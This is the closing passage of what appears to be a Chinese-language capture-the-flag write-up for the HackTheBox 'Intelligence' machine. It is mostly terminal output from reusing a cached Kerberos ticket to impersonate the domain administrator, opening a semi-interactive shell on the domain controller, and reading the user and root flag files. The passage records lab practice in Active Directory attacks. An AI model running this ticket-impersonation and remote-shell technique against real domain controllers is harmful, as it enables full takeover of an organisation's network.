[+] Using TGS from cache
[+] Changing sname from WWW/dc.intelligence.htb@INTELLIGENCE.HTB to HOST/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB and hoping for the best
[+] Using Kerberos Cache: administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
[+] SPN HOST/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for WWW/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB
[+] Using TGS from cache
[+] Changing sname from WWW/dc.intelligence.htb@INTELLIGENCE.HTB to HOST/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB and hoping for the best
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is E3EF-EBBD

 Directory of C:\

04/18/2021  05:52 PM    <DIR>          inetpub
04/18/2021  05:50 PM    <DIR>          IT
06/29/2021  02:30 PM             5,510 License.txt
04/18/2021  05:38 PM    <DIR>          PerfLogs
04/18/2021  05:23 PM    <DIR>          Program Files
04/18/2021  05:21 PM    <DIR>          Program Files (x86)
04/18/2021  06:20 PM    <DIR>          Users
07/08/2026  02:27 PM    <DIR>          Windows
               1 File(s)          5,510 bytes
               7 Dir(s)   5,901,996,032 bytes free

C:\>whoami
intelligence\administrator

C:\>

成功提权,读取一下 flag

user.txt:

C:\Users\Ted.Graves\desktop>type ..\..\Tiffany.Molina\desktop\user.txt
[+] Using Kerberos Cache: administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
[+] SPN HOST/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for WWW/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB
[+] Using TGS from cache
[+] Changing sname from WWW/dc.intelligence.htb@INTELLIGENCE.HTB to HOST/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB and hoping for the best
bc2fece9317793a20a79296892b30ce8

root.txt:

C:\Users>type Administrator\desktop\root.txt
[+] Using Kerberos Cache: administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
[+] SPN HOST/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for WWW/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB
[+] Using TGS from cache
[+] Changing sname from WWW/dc.intelligence.htb@INTELLIGENCE.HTB to HOST/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB and hoping for the best
505d104fb1280e27859876316655f688
文末附加内容
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇